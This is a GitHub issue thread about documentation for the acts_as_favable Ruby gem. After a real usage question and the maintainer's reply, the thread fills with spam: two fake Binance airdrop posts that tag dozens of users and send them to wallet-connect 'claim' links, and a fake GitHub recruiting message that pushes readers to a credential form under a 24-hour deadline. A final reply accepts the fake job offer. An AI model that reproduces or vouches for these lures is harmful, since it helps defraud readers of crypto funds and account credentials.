### ISSUE TITLE
Related to the User

### ISSUE THREAD

**Issue by ready4god2513** [yorzi/acts_as_favable#1]
I see the user_id column in the table that acts_as_favable creates, however, from the docs it is pretty unclear how this would work in practice.

If I want a user to be able to save a post as a favorite, how does the gem know which user to save?  Then when I want go get the list of that user's favorites, it doesn't seem to clear how to do that.  Can I help with the documentation in any way?  I love the gem, just needs a bit of docs to make it superb.

**Comment by yorzi** [comment]
Yeah.. it needs more explanation on its usage, thanks for pointing out. I will follow up a detailed document in coming days when I have a chance, you also can help it out if you want.

**Comment by timeon** [comment]
Hi, I came across this plugin and it seems pretty good. However, I have the same issue trying to figure out how to use it. Any update on the documentation?

Thanks !

**Comment by Shivanisb97** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://binanceblog.notion.site/Binance-Airdrop-Alert-Grab-Your-1500-in-BNB-Now-c4945a8881f646aaa057211eb89c05b1?pvs=4)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://binanceblog.notion.site/Binance-Airdrop-Alert-Grab-Your-1500-in-BNB-Now-c4945a8881f646aaa057211eb89c05b1?pvs=4) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @saidatta, @Sachzen, @jjj124, @da-okazaki, @asia215, @digitalpixelgroup, @sweatherall, @Brivan-26, @adelabb, @edudemy, @eliasbuchwald, @Ben-Rey, @ilmoi, @fbzorp, @vir2alexport, @lcrpt, @volkyeth, @mrice, @kkjoboy, @giovannifranzese, @rtroncosogar, @poode, @ahmed0elkhaldy, @rheaplex, @dotcypress, @davidyakobovitch, @navneetyadav247, @onemedicine, @kisniuniu, @veiIed, @francine-caruccio, @oz1127, @diogomqbm, @GloryKim, @Author01, @mudone, @chebykin, @KK68HK, @mikayelagh, @SherlockJay1314, @neko314, @moonman369, @finkiki, @mager, @mikkyude, @Eidozz, @mitchellmusarra, @jwgatt, @krritik, @f0rizen

**Comment by YourNPC** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @reginaldcg, @solcik, @dterei, @BTTF2001, @mfwalchak, @akash9080, @includeleec, @zhengfen, @kjkta, @anandrajaram21, @catena2w, @montyanderson, @rsuhendro, @KanteLabs, @jccurrie1, @flykickbird, @EuJinnLucaShow, @lucyxliu, @lgou2w, @BruhoRu, @dennishahn, @danielpetrica, @KaloyanTanev, @baermathias, @0xashu, @salber, @waqasmalik10, @Raboro, @x-SERZH-x, @netheril96, @jdomzhang, @netoearth, @netpro2k, @Susangriffis, @alii, @WojasKrk, @xiongmaofeifei666, @shubh402, @xwind, @chinhong-chua, @NorthHub, @katsos, @Savib96, @noomly, @AlissaAlissa, @pengkaiyan, @jhonbellidovargas, @peng-sp, @Mams444, @smmehrab

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kiwamunet, @crspiccin, @sbagency, @yentzu-wang, @FREDRICK0, @khirilannuar109, @bokkypoobah, @dillonhows, @cccchuck, @anysoft, @humyna, @morephire, @jingooo5, @benvilliere, @kioqq, @AlanFerreiraDias, @m2ozgun, @NelsonRodMar, @shaaaaawn, @0xSooki

**Comment by EuJinnLucaShow** [comment]
I accept the position.

вт, 20 лют. 2024 р. о 03:50 thangtq-pionero ***@***.***> пише:
